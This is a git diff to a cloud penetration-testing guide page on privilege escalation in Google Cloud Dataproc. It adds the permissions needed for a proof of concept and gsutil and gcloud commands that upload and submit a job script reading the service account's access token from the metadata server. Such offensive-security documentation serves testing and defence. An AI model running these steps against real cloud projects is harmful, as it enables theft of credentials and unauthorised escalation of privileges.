diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md index 8dee9c50c..fa004ef8c 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md @@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating, These permissions make both roles highly sensitive and dangerous if misused. +## dataproc.jobs.create & dataproc.clusters.use + +The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create). + +the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list) + ## Privilege Escalation via Metadata Token Leaking -By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can: + - Submit a job to a Dataproc cluster. @@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc import requests -# Metadata server URL to fetch the access token +## Metadata server URL to fetch the access token ``` metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token" @@ -53,6 +59,9 @@ if __name__ == "__main__": ### Steps to exploit ``` +# Copy the script to the storage bucket +gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py +# Submit the malicious job gcloud dataproc jobs submit pyspark gs:///fetch_metadata_token.py \ --cluster= \ --region=